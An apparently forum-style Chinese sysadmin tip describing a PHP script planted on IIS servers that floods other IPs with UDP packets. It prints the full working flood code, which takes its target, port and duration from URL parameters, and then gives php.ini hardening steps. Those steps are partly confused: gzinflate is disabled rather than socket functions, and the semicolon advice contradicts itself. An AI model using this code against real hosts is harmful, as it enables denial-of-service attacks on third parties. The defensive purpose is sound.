| 特征: 
 用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
 
 
 $packets = 0;
 $ip = $_GET[\'ip\'];
 $rand = $_GET[\'port\'];
 set_time_limit(0);
 ignore_user_abort(FALSE);
 
 $exec_time = $_GET[\'time\'];
 
 $time = time();
 print \"Flooded: $ip on port $rand
 
 \";
 $max_time = $time+$exec_time;
 
 
 for($i=0;$i<65535;$i++){
 $out .= \"X\";
 }
 while(1){
 $packets++;
 if(time() > $max_time){
 break;
 }
 
 $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
 if($fp){
 fwrite($fp, $out);
 fclose($fp);
 }
 }
 echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
 ?>
 
 
 表现特征:
 
 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
 
 解决办法:
 
 禁止上述的代码:
 在c:\windows\php.ini里设置:
 disable_functions =gzinflate;
 
 
 在c:\windows\php.ini里设其值为Off
 allow_url_fopen = Off
 
 
 
 并且:
 
 ;extension=php_sockets.dll
 
 前面的;号一定要有,意思就是限制用sockets.dll
 
 
 前面的;号要去掉
 
 然后重启IIS
 
 
 如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
 |